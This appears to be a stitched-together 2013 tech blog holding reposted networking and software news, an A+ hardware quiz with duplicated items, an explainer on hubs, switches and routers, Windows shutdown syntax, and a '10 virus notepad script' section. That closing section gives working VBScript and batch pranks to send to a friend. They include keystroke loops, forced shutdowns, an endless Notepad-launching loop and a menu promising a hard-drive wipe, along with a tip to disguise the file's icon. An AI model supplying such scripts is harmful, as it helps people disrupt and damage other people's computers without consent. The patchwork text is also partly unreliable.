Wednesday 23 October 2013

Intel chip chief Dadi Perlmutter to leave company

DG News Service - Once considered a likely candidate for Intel's CEO job, Dadi Perlmutter, executive vice president and general manager of the Intel Architecture Group, is leaving the company.
Perlmutter is leaving the company of his own accord, said Chuck Mulloy, an Intel spokesman. His last day will be Feb. 20 of next year.
"He's looking forward to pursuing other opportunities," Mulloy said. "We're happy for him personally."
Perlmutter was considered a top candidate to replace former CEO Paul Otellini, but the position went to another internal candidate, Brian Krzanich, formerly chief operating officer and senior vice president. Renee James, another internal CEO candidate who previously was senior vice president and general manager of software and services, was promoted to president.
But Perlmutter was seen by analysts as an odd man out after some of his duties were distributed in the midst of multiple management shakeups over the last two years. Industry observers said it was only a matter of time until he departed the company.
Perlmutter could have continued with the company and had "some other options to contribute," Mulloy said, but did not provide details.
Perlmutter has been with Intel for 34 years. He was credited by Mulloy for the company's success in the PC and server processor markets.
"Intel's success in those markets was because of the work that Dadi did as a manager of those groups,"

5G will have to do more than send speed up your phone, Ericsson says

IDG News Service - For consumers looking forward to 5G mobile technology for super-high speed, network giant Ericsson says there will be more to it than that -- and less.
A 5G mobile standard isn't in formal development yet and isn't likely to be in commercial networks until 2020, according to Vish Nandlall, Ericsson's CTO and senior vice president of strategy, who spoke at the GigaOm Mobilize conference Wednesday. Even then, 5G won't be totally at consumers' beck and call to deliver their cat videos and social network feeds.
More so than any previous generation of cellular gear, 5G will have to serve two masters, Nandlall said. Between wireless sensors, industrial equipment and an array of consumer gadgets, in a few years there are likely to be 10 mobile connections per person. If 5 billion humans join the mobile world, that's 50 billion connections that 5G networks will need to serve.
Not all of those devices will be hungry for megabits per second, Nandlall said. For example, remote sensors may need slow connections to achieve decades of battery life, while other pieces of the so-called Internet of Things may have to have much higher reliability than consumers get when they're just making phone calls.
"Every now and then, those calls drop, and that's probably not something that we want if I'm putting an industrial application on it," Nandlall said. For example, a device that turns the floodgates on a dam had better work correctly and at the right time, he said.
Bandwidth-hungry consumers won't get left behind, Nandlall said: As the next major step in the standards process, 5G should deliver 10 times the speed of 4G, putting a theoretical maximum of 10Gbps (bits per second) on the books. But with many more uses of wireless emerging, service providers may carve up their 5G networks and dedicate only part of that capacity to what we think of today as the mobile Internet, he said.
In an example of software's growing role in networks, 5G should be flexible enough that carriers can reprogram and reconfigure their networks to accommodate different applications, according to Nandlall.
"Those will actually get different slices of the network with different technologies," including modulation schemes and levels of capacity, Nandlall said. He compared the future architecture to cloud computing with multiple tenants each running their own applications.
Meanwhile, 4G will coexist with 5G, along with Wi-Fi and other technologies, which may include a future lightweight protocol specially designed for machine-to-machine communications, he said.
By moving to 5G, carriers should be able to keep cutting the price of mobile data, Nandlall said. Most consumers haven't recognized falling prices because their consumption continues to rise, he said. Network efficiencies have slashed the cost of delivering a megabyte of data by about 50 percent per year, from about 46 cents in 2008 to between 1 cent and 3 cents now. That hasn't lowered subscribers' bills at the end of the month because average data consumption has been doubling or more each year, he said.Those looking at requirements for future 5G networks want them to be able to support 50GB of data consumption per subscriber, per month.

Cisco raises Catalyst switch prices by up to 67%

Network World - Cisco is raising the price on older generation Catalyst switches in an effort to prod users into buying newer gear.
According to a Cisco document obtained by Network World, Cisco is raising the price of some Catalyst 3000, 4000 and 6000 series switches and associated products by up to 67% to encourage purchase of newer equipment. The price increases do not affect the new products, which include the Catalyst 6500 Supervisor 2T engine and the Catalyst 4500 Supervisor 8E.
It does impact the Catalyst 6500 Supervisor 720, and older Catalyst 3750 and 3560 products are affected. New Catalyst 3850 and 3650 switches do not appear on the price increase document.
Cisco confirmed the price increase on the older gear.
"There are no price increases to the new Cisco switching products that have been recently announced, including the Catalyst 2960-X, 3850, 3650, 4500E with Sup 8E, and 6800, which offer greater functionality at either the same or lower price," a company spokesperson said in an e-mailed statement. "There is a slight price increase for very small subset of older Catalyst models that now have a next generation option available to customers."
One increase impacts a Catalyst 6500 distributed forwarding card with the part number WS-F6700-DFC3CXL. The price has been raised from $15,000 to $25,000, an increase of 67%. Its replacements, parts WS-F6K-DFC4-AXL and WS-F6K-DFC4-EXL, are priced at $20,000, 33% higher than the DFC3CXL card.
The price increases take effect Nov. 2.
Resellers say Cisco at times will resort to this practice as an alternative to putting popular products on end-of-life notice. In some instances the company will charge more for a SMARTNet service contract on the old gear than for the newer replacement product, they say.
Below is a snapshot of the Catalyst 6000 product increases and replacement product pricing taken from the document.  

Microsoft Word: At 30, the word processing package is king, but threats abound

Network World - It is 30 years old and dominates the word processing market, but Microsoft Word is now more than ever fending off challenges from the cloud where less expensive and even free alternatives pose new threats, experts say.
Google Docs, IBM Docs and Apache’s free OpenOffice Writer are relatively well known but not-so-well used alternatives that vie for Word customers, largely without undermining Word’s solid base
[QUIZ: Word at 30 
The problem for competitors is that Word has ruled word processing for so long that most people are familiar with how it works and recognize the value of using it because its documents can be read nearly ubiquitously, says Michael Silver, an analyst with Gartner.
There’s a core set of capabilities customers want, and they have very little interest beyond them, Silver says, making it hard for the competition to lure customers away with new features. “The problem is people view word processing as a commodity,” he says.
The flip side is that alternative word processors could pick off customers because they offer those core capabilities cheaper. “Why pay so much to do what a much less expensive product can do for you?” he says. For example, Office Professional 2013, which contains Word, can be downloaded for $261.50 from Amazon.com; OpenOffice, which contains Writer, is free.
Price doesn’t seem to force shifts in loyalty, though, because in a Word-dominated world, when someone receives a Word document, they want to see it as it was created to be, and that requires Word. “There is no other product that can maintain the fidelity of a document created in Word,” says Silver.
This difficulty that challengers face is borne out by a recent Forrester Research survey that polled 155 IT decision makers about use of office productivity suites. Two years ago, the survey found 13% supported OpenOffice or a variant; this year that number was 5%, and that included an offshoot of OpenOffice called LibreOffice, according to “Office 2013 And Productivity Suite Alternatives”, written by Forrester analyst Philipp Karcher.
In the survey, 77% say it’s important that whatever suite of office productivity apps they use they must be compatible with Office formats.
Within a year, 38% of those surveyed say they will be using the latest version, Office 2013, although most of them that already use an earlier version say the upgrade comes with their current license. Still, for about half of respondents the migrations take 12 to 18 months, which signals a commitment to the suite.
Alternatives such as Google Docs and IBM Docs that are Web based pose a different challenge, but Microsoft has countered with Office Web Apps. These packages support word processing via browser, and Google is formidable. “Web versions of Word have much less functionality than Google Docs,” Silver says. “In the past few years customers have moved to Web Office on tablets but don’t get the experience they were looking for. It has three or four tabs with different functionalities to choose from, but the native version has nine tabs.”Word remains the standard, though. Even these competitors use compatibility with Word and other Office apps as a selling point.
“Whether starting from scratch or making use of existing Microsoft Office … you and your team can use IBM Docs to work together…” an IBM promotional video says.
Office 365, which includes packages ranging from online-only access to apps to both online and desktop versions plus other services, can match offers from a range of competitors. According to Microsoft, it is doing well; in less than two years it is a $1.5 billion business, and its subscriptions account for 25% of Office 2013 sales. “Office 365 not only allows access from anywhere, it guarantees Microsoft regular subscription income from customers,” Silver says.
Microsoft is trying to drive business customers to its cloud offerings because they automatically provide the latest versions of the applications that customers might otherwise skip, says Karcher. “They say, ‘that doesn’t deliver us increasing business benefits,’” he says. The licensing costs of upgrading each time for Office vs the cost of Office 365 is about a wash, but the subscription model guarantees Microsoft a revenue stream.
“The idea is for customers to continually pay for access rather than make a decision three years in advance if they want to [deploy the new version in their own data centers and] get an upgrade with a discount,” Karcher says.
Microsoft is trying to perpetuate the Word habit by offering low-cost and free versions of Office 365 to students. University students can get a four-year subscription for $80 and colleges that subscribe to Office 365 for faculty and staff get it for students, too, at no extra charge.
Word as bundled in Office continues its success, but is definitely being threatened, Silver says, especially as PC sales slip and tablets and phones become more popular computing devices. “The mobility wars will certainly shed light on what’s going on,” he says. “This includes whether and when Microsoft develops an iPad version of Office and whether that version supports the full range of features and functionality.”
Microsoft has said it’s delaying an Office for iPad version until it fully optimizes Office for its own Windows 8.1 touch-centric operating system, effectively forcing iPad customers who want to use Word on the devices to subscribe to Office Web Apps.
Meanwhile, Microsoft has to deal with plotting a future course for Word to add new features without upsetting customers who have grown comfortable with the app as it is. For example, in 2007, Microsoft changed the interface to make features easier to find, but long-time users complained things had changed and they couldn’t find their favorite features in the new places, Silver says. “Word is the poster child for the innovator’s dilemma,” he says. “If Microsoft makes big changes to Word, it won’t be the product customers know.”
Word contains a lot of features customers never use or even know about. Microsoft adds innovations and features with every release but a lot of folks use relatively few of them and some may not even know what’s been added, he says.With the increasing influence of mobility, users are becoming comfortable with finding individual apps that serve their needs and don’t care so much about whether they have access to a suite of apps, Karcher says.
Regardless, because Word is so entrenched in customers’ minds as well as with other Office applications, it is a formidable competitor. “Microsoft integrates Word more and more tightly with other applications with each release,” Silver says, “such as SharePoint, Lync and Exchange. That broadens Word’s footprint within Office and makes the product stickier with customers by making it more difficult to move to something else.”
That translates into a formidable challenge for competitors trying to get customers to scrap Office. “None of our clients are doing that,” he says.
Tim Greene covers Microsoft and unified communications for Network World and writes the Mostly Microsoft blog. Reach him at http://gauravmahapatra.blogspot.in/ and follow him on Twitter@Tim_Greene.
Read more about software in Network World's Software section.

Thursday 17 October 2013

Quiz 

1. Which device uses a DMA channel?

a) modem
b) sound card
c) laser printer
d) cable video tuner b a 0 11:11 

2. Which type of equipment or supply is usually recycled?

a) chemical solvents
b) CMOS battery
c) toner cartridge
d) CRT c a 0 11:11 

3. If you boot a computer but don't hear any beeps, what can you assume?

a) BIOS configuration was corrupted
b) The monitor is not powered on
c) The speaker may be defective or disconnected
d) This is normal c c 2 11:12 

4. Setting a printer in a hex trace mode helps to:

a) diagnose print quality
b) diagnose communication problems
c) check the printer emulation mode
d) reset the printer emulation mode b b 2 11:13 

5. The default I/O address for COM1 is

a) 2F8
b) 3F8
c) 220
d) 330 b b 2 11:14 

6. Which type of processor fits into Slot1?

a) P5
b) 486
c) Pentium Pro
d) Pentium II d d 2 11:15 

7. When is the risk of ESD greatest?

a) during an electrical storm
b) when humidity is high
c) just prior to an electrical storm
d) when humidity is low d a 0 11:16 

8. Roughly every 16 milliseconds dynamic RAM must be:

a) cooled
b) cached
c) refreshed
d) reloaded c c 2 11:17 

9. Which dot matrix component presents a risk of burns?

a) print head
b) control unit
c) drive motor
d) heater roller a a 2 11:17 

10. What is the best ground for a conductive workbench mat?

a) chassis ground
b) AC receptacle ground
c) workbench ground
d) tandem ground to another device b a 0 11:18 

11. Which of the following is a type of parallel port?

a) COM1
b) ECP
c) 10BaseT
d) RJ-45 b b 2 11:18 

12. After installing a new hard drive you get the message "Invalid media type". What should you use to correct the problem?

a) FORMAT
b) the diagnostics
c) COMMAND.COM
d) CHKDSK a a 2 11:18 

13. If the memory slots have 168 pins, the chip is a:

a) DIP
b) WRAM
c) SIMM
d) DIMM d d 2 11:18 

14. What can happen if a power cable and a printer cable are too close together?

a) The parallel port may fail
b) The serial port may fail
c) The power supply may overheat
d) EMI may occur d d 2 11:19 

15. Before removing the case, you should:

a) check free disk space
b) record CMOS settings
c) record monitor settings
d) disconnect the network cable b b 2 11:19 

16. Which option best represents the levels of cache available in a Pentium Pro processor?

a) L1
b) L1 and L2
c) L1, L2 and L3
d) L1, L2, L3 and L4
e) L1 and L3
f) L2 and L3 b a 0 11:19 

17. Which piece of equipment will protect a computer from a deficient power sag?

a) grounded AC outlet
b) UPS
c) surge suppressor
d) UL-1449 rated outlet b b 2 11:20 

18. When replacing a fuser assembly in a laser printer, be careful because:

a) it could be electrically charged
b) it could be hot
c) the roller could have sharp edges
d) the toner could leak out b b 2 11:20 

19. Which is the bootable file of Windows Xp?

a) Command.com
b) Ntldr
c) Ntoskrnl
d) Explorer.exe b b 2 11:20 

20. In inkjet technology, the droplets of ink are deflected by:

a) a multi-directional nozzle
b) electrically charged plates
c) high-pressure jets
d) eletrostatic absorption b b 2 11:21 

21. In inkjet technology, the droplets of ink are deflected by:

a) a multi-directional nozzle
b) electrically charged plates
c) high-pressure jets
d) eletrostatic absorption b b 2 11:21 

22. You suspect your telecommunications software is NOT dialing your modem properly. What is the AT command to have your modem dial 523-2407?

a) AT5232407
b) ATDT5232407
c) ATM5232407
d) AT5232407DT b b 2 11:23 

23. Which common bus specification provides the fastest data transfer rate?

a) VL-Bus
b) ISA
c) EISA
d) PCI d d 2 11:24 

24. For which laser component is it crucial to avoid exposure to sunlight?

a) drum cartridge
b) primary corona wire
c) transfer corona assembly
d) separation belt a a 2 11:24 

25. A parity error most likely indicates:

a) bad software
b) a bad hard drive
c) a bad RAM chip
d) a bad sound card c c 2 11:24 


26. Which of the following IRQs is likely to be used by a serial device?

a) 1
b) 2
c) 3
d) 4
e) 5
f) 6 d c 0 11:26 

27. Which code is run first during the boot process?

a) DOS
b) ROM BIOS
c) RAM BIOS
d) shadow ROM b b 2 11:27 


28. What can you use to ensure the power is not interrupted briefly?

a) battery back-up unit
b) proper grounding
c) surge protector
d) data guard strip a a 2 11:27 

29. How many pins can a serial port have?

a) 15
b) 9
c) 20
d) 8 b b 2 11:27 

30. The default resource settings for LPT2 are I/O address:

a) 2F8 and IRQ7
b) 370 and IRQ9
c) 278 and IRQ5
d) 3F8 and IRQ11 c c 2 11:28 

31. Which processor would be used in a socket type 7?

a) Pentium
b) 786
c) Pentium II
d) 386 a a 2 11:28 

32. The modem did not hang up after being connected. What is the correct AT command to tell the modem to hang up?

a) ATH
b) ATM
c) ATX
d) ATD a a 2 11:28 

33. During bootup, the system displays "Fixed Disk Error". What is the likely cause?

a) a loose CPU
b) an incorrect setting in CMOS
c) an unconnected floppy drive
d) an incorrect setting in ROM BIOS b d 0 11:30 

34. In laser printer technology, what occurs during the writing stage of the image formation?

a) An alternating charge is applied to the drum
b) A uniform negative charge is applied to the drum
c) The print image is transferred to the paper
d) The print image is written to the drum d d 2 11:31 

35. Which of the following is also known as firmware?

a) DOS
b) Windows
c) CMOS/BIOS
d) ASCII c c 2 11:31 

36. In a full-duplex data circuit the direction of travel is:

a) one direction only
b) both directions sequentially
c) both directions simultaneously
d) both directions, but not simultaneoulsy c c 2 11:31 


37. A narrow SCSI chain can handle up to how many devices?

a) 4
b) 7
c) 8
d) 32 b b 2 11:32 


38. The power supply

a) modulates power spikes
b) converts DC current to low-voltage AC
c) converts AC to DC current
d) regulates the ground potential for ESD b c 0 11:32 

39. The correct handshake signal combinations used in serial data transfers are:

a) Data Terminal Ready and Data Set Ready
b) Data Terminal Read and Select In
c) Request to Send and Request to Receive
d) Acknowledge and Busy c c 2 11:33 

40. Which type of bus provides up to a 16-bit data path?

a) ISA
b) EISA
c) PCI
d) VL-Bus a a 2 11:33 

41. Roughly every 16 milliseconds dynamic RAM must be:

a) cooled
b) cached
c) refreshed
d) reloaded c c 2 11:34 

42. When testing a fuse, you should set a Volt-Ohm-Meter to which configuration?

a) ohms
b) amperage
c) AC volts
d) DC volts a a 2 11:34 

43. In laser printer technology, what occurs during the writing stage of the image formation?

a) An alternating charge is applied to the drum
b) A uniform negative charge is applied to the drum
c) The print image is transferred to the paper
d) The print image is written to the drum d d 2 11:35 

44. Setting a printer in a hex trace mode helps to:

a) diagnose print quality
b) diagnose communication problems
c) check the printer emulation mode
d) reset the printer emulation mode b b 2 11:35 

45. To improve the access time of the processor for frequently used memory locations and their addresses, you should upgrade the:

a) hard drive
b) ROM BIOS
c) ROM memory
d) cache memory d d 2 11:36 

46. A bi-directional parallel cable is an:

a) RS-232C
b) RS-241
c) RJ-45
d) IEEE 1284 d d 2 11:38 

47. A 9-pin DB connector is used for a

a) serial port
b) parallel port
c) VGA port
d) MIDI port a a 2 11:38 

48. ATAPI compliance is a standard for:

a) CPUs
b) modems
c) power supplies
d) mass storage devices d d 2 11:39 

49. What is a feature of Enhanced IDE?

a) up to six drives
b) parallel connections
c) high-speed floppy drives
d) ATAPI d a 0 11:39 

50. A valid SCSI ID for a SCSI-2 is:

a) 7
b) 6
c) 5
d) 8
e) 9
f) 10 a a 2 11:39 

The functions of the three devices are all quite different from one another, even if at times they are all integrated into a single device. Which one do you use when? Let's take a look..
http://gauravmahapatra.blogspot.in/

Hub




An Ethernet hubactive hubnetwork hubrepeater hubmultiport repeater or hub is a device for connecting multiple Ethernet devices together and making them act as a single network segment. It has multiple input/output (I/O) ports, in which a signal introduced at the input of any port appears at the output of every port except the original incoming. A hub works at the physical layer (layer 1) of the OSI model. The device is a form of multiportrepeater. Repeater hubs also participate in collision detection, forwarding a jam signal to all ports if it detects a collision.
Some hubs may also come with a BNC and/or Attachment Unit Interface (AUI) connector to allow connection to legacy 10BASE2 or 10BASE5network segments. The availability of low-priced network switches has largely rendered hubs obsolete but they are still seen in 20th century installations and more specialized applications

Switch 
Switch
network switch or switching hub is a computer networking device that links network segments or network devices. The term commonly refers to a multi-portnetwork  bridge that processes and routes data at the data link layer (layer 2) of the OSI model. Switches that additionally process data at the network layer (layer 3) and above are often called layer-3 switches or multilayer switches.

Switches exist for various types of networks including Fibre Channel, Asynchronous Transfer Mode, InfiniBand, Ethernet and others. The first Ethernet switch was 


Router



A router is a device that forwards data packets between computer networks, creating an overlay internetwork. A router is connected to two or more data lines from different networks. When a data packet comes in one of the lines, the router reads the address information in the packet to determine its ultimate destination. Then, using information in its routing table or routing policy, it directs the packet to the next network on its journey. Routers perform the "traffic directing" functions on theInternet. A data packet is typically forwarded from one router to another through the networks that constitute the internetwork until it reaches its destination node.[1]
The most familiar type of routers are home and small office routers that simply pass data, such as web pages, email, IM, and videos between the home computers and the Internet. An example of a router would be the owner's cable or DSL modem, which connects to the Internet through an ISP. More sophisticated routers, such as enterprise routers, connect large business or ISP networks up to the powerful core routers that forward data at high speed along the optical fiber lines of theInternet backbone. Though routers are typically dedicated hardware devices, use of software-based routers has grown increasingly common.

The Differences Between Hubs, Switches, and Routers on the Network

Today most routers have become something of a Swiss Army knife, combining the features and functionality of a router and switch/hub into a single unit. So conversations regarding these devices can be a bit misleading — especially to someone new to computer networking.
The functions of a router, hub and a switch are all quite different from one another, even if at times they are all integrated into a single device. Let's start with the hub and the switch since these two devices have similar roles on the network.Each serves as a central connection for all of your network equipment and handles a data type known as frames. Frames carry your data. When a frame is received, it is amplified and then transmitted on to the port of the destination PC. The big difference between these two devices is in the method in which frames are being delivered.In a hub, a frame is passed along or "broadcast" to every one of its ports. It doesn't matter that the frame is only destined for one port. The hub has no way of distinguishing which port a frame should be sent to. Passing it along to every port ensures that it will reach its intended destination. This places a lot of traffic on the network and can lead to poor network response times.Additionally, a 10/100Mbps hub must share its bandwidth with each and every one of its ports. So when only one PC is broadcasting, it will have access to the maximum available bandwidth. If, however, multiple PCs are broadcasting, then that bandwidth will need to be divided among all of those systems, which will degrade performance.A switch, however, keeps a record of the MAC addresses of all the devices connected to it. With this information, a switch can identify which system is sitting on which port. So when a frame is received, it knows exactly which port to send it to, without significantly increasing network response times. And, unlike a hub, a 10/100Mbps switch will allocate a full 10/100Mbps to each of its ports. So regardless of the number of PCs transmitting, users will always have access to the maximum amount of bandwidth. It's for these reasons why a switch is considered to be a much better choice then a hub.Routers are completely different devices. Where a hub or switch is concerned with transmitting frames, a router's job, as its name implies, is to route packets to other networks until that packet ultimately reaches its destination. One of the key features of a packet is that it not only contains data, but the destination address of where it's going.A router is typically connected to at least two networks, commonly two Local Area Networks (LANs) or Wide Area Networks (WAN) or a LAN and its ISP's network . for example, your PC or workgroup and EarthLink. Routers are located at gateways, the places where two or more networks connect. Using headers and forwarding tables, routers determine the best path for forwarding the packets. Router use protocols such as ICMP to communicate with each other and configure the best route between any two hosts.Today, a wide variety of services are integrated into most broadband routers. A router will typically include a 4 - 8 port Ethernet switch (or hub) and a Network Address Translator (NAT). In addition, they usually include a Dynamic Host Configuration Protocol (DHCP) server, Domain Name Service (DNS) proxy server and a hardware firewall to protect the LAN from malicious intrusion from the Internet.All routers have a WAN Port that connects to a DSL or cable modem for broadband Internet service and the integrated switch allows users to easily create a LAN. This allows all the PCs on the LAN to have access to the Internet and Windows file and printer sharing services.Routers might have a single WAN port and a single LAN port and are designed to connect an existing LAN hub or switch to a WAN. Ethernet switches and hubs can be connected to a router with multiple PC ports to expand a LAN. Depending on the capabilities (kinds of available ports) of the router and the switches or hubs, the connection between the router and switches/hubs may require either straight-thru or crossover (null-modem) cables. Some routers even have USB ports, and more commonly, wireless access points built into them.Some of the more high-end or business class routers will also incorporate a serial port that can be connected to an external dial-up modem, which is useful as a backup in the event that the primary broadband connection goes down, as well as a built in LAN printer server and printer port.Besides the inherent protection features provided by the NAT, many routers will also have a built-in, configurable, hardware-based firewall. Firewall capabilities can range from the very basic to quite sophisticated devices. Among the capabilities found on leading routers are those that permit configuring TCP/UDP ports for games, chat services, and the like, on the LAN behind the firewall.So, in short, a hub glues together an Ethernet network segment, a switch can connect multiple Ethernet segments more efficiently and a router can do those functions plus route TCP/IP packets between multiple LANs and/or WANs; and much more of course

What is the Shutdown Command?

What is the Shutdown Command?

The shutdown command is a Command Prompt command that can be used to shut down, restart, log off, or hibernate your own computer.
The shutdown command can also be used to remotely shut down or restart a computer you have access to over a network.

Shutdown Command Syntax:

shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e |/o] [/hybrid] [/f] [/m \\computername] [/t xxx] [/d[p:|u:]xx:yy] [/c "comment"] [/?]
Tip: See How To Read Command Syntax if you're not sure how to read the shutdown command syntax shown above.
/i = This shutdown option shows the Remote Shutdown Dialog, a graphical version of the remote shut down and restart features available in the shutdown command. The /i switch must be the first switch shown and all other options will be ignored.
/l = This option will immediately log off the current user on the current machine. You can not use the /loption with the /m option to log off a remote computer. The /d/t, and /c options are also not available with /l.
/s = Use this option with the shutdown command to shut down the local or /m defined remote computer.
/r = This option will shut down and then restart the local computer or the remote computer specified in/m.
/g = This shutdown option functions the same as the /r option but will also restart any registered applications after the reboot.
/a = Use this option to stop a pending shut down or restart. Remember to use the /m option if you're planning on stopping a pending shut down or restart that you executed for a remote computer.
/p = This shutdown command option turns off the local computer completely. Using the /poption is similar to executing shutdown /s /f /t 0. You can not use this option with /t.
/h = Executing the shutdown command with this option immediately puts the computer you're on into hibernation. You can not use the /h option with the /m option to put a remote computer into hibernation, nor can you use this option with /t/d, or /c.
/e = This option enables documentation for an unexpected shut down in the Shutdown Event Tracker.
/o = Use this shutdown switch to end the current Windows session and open the Advanced Boot Options menu. This option must be used with /r. The/o switch is new beginning in Windows 8.
/hybrid = This option performs a shutdown and prepares the computer for fast startup. The /hybridswitch is new beginning in Windows 8.
/f = This option forces running programs to close without warning. Except with the /l/p, and /hoptions, not using shutdown's /f option will present a warning about the pending shut down or restart.
/m \\computername = This shutdown command option specifies the remote computer that you want to execute a shut down or restart on.
/t xxx = This is the time, in seconds, between the execution of the shutdown command and the actual shut down or restart. The time can be anywhere from 0 (immediately) to 315360000 (10 years). If you don't use the /t option then 30 seconds is assumed. The /toption is not available with either the /l/h, or /p options.
/d [p:|u:]xx:yy = This records a reason for the restart or shut down. The p option indicates a planned restart or shut down and the u a user defined one. The xx and yy options specify major and minor reasons for the shut down or restart, respectively, a list of which you can view by executing the shutdown command without options. If neither p nor u are defined, the shut down or restart will be recorded as unplanned.
/c "comment" = This shutdown command option allows you to leave a comment describing the reason for the shut down or restart. You must include quotes around the comment. The maximum length of the comment is 512 characters.
/? = Use the help switch with the shutdown command to show detailed help about the command's several options. Executing shutdown without any options also displays the help for the command.
Tip: Each time Windows is shut down or restarted manually, including via the shutdown command, the reason, type of shut down, and [when specified] comment are recorded in the System log in Event Viewer. Filter by the USER32 source to find the entries.
Tip: You can save the output of the shutdown command to a file using a redirection operator. See How To Redirect Command Output to a File for help doing that or see Command Prompt Tricks for more tips.

Shutdown Command Examples:

shutdown /r /d p:0:0
In the above example, the shutdown command is used to restart the computer that's currently being used and records a reason of Other (Planned). The restart is designed by /rand the reason is specified with the /d option with p representing that the restart is planned and the 0:0 indicating an "Other" reason.
Remember, major and minor reason codes on a computer can be displayed by executing shutdown without options and referencing the Reasons on this computer table that's displayed.
shutdown /l
Using the shutdown command as shown here, the current computer is immediately logged off. No warning message is displayed.
shutdown /s /m \\SERVER /d p:0:0 /c "Planned restart by Tim"
In this shutdown command example, a remote computer named SERVER is being shut down with a recorded reason of Other (Planned). A comment is also recorded as Planned restart by Tim. Since no time is designated with the /t option, the shutdown will begin on SERVER 30 seconds after executing the shutdown command.
shutdown /s /t 0
Finally, in this last example, the shutdown command is used to shut down the local computer immediately since we designated a time of zero with the shutdown /t option.

Shutdown Command Availability:

The shutdown command is available from within the Command Prompt in Windows 8,Windows 7, Windows Vista, and Windows XP operating systems.
Note: The availability of certain shutdown command switches and other shutdown command syntax may differ from operating system to operating system.

Wednesday 16 October 2013

Convert Text Into Audio Using Notepad
By this trick you can convert any text to audio with just a click. And it doesn’t even require you to pay tons of dollars forany software program to install.

How To Do This ?

Step 1: Open Notepad file on your Windows P.C.

Step 2: Copy and paste the below mentioned code :
Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.techvorm.com","TechVorm Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Step 3: Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
Texttoaudio
Thats it ! Your  free Text to Audio converter is ready to be used. Now open the saved file and enter the text you want to convert and click OK. If y it doesn’t work let me know by leaving a comment below.

10 virus notepad script

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
